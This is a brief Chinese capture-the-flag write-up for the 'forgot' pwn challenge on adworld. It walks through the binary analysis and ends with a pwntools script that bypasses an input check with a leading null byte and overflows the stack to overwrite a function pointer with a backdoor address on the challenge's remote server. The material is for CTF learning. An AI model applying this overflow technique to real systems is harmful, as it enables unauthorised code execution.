[攻防世界 pwn]——forgot
- 题目地址: https://adworld.xctf.org.cn/
- 题目:
在checksec看下保护
在IDA中,
竟然有后面函数, 找到sub_80486CC函数地址
发现最后(*(&v3 + --v14))()执行
我们可以令v14 = 1这样就相当于v3所指向的函数执行
将v3所指向的函数地址覆盖为我们想要的函数地址就可以了
第一个栈溢出无法利用, 第二个可以利用
利用’\x00’开头的字符串绕过检查, v2距离v3 = 0x20
exploit
from pwn import *
p=remote("111.200.241.244",39247)
context.log_level = 'debug'
p.recvuntil("> ")
p.sendline('peak')
payload='\x00' + 'a'*(0x20 - 1)+p32(0x080486cc)
p.recvuntil("> ")
p.sendline(payload)
p.interactive()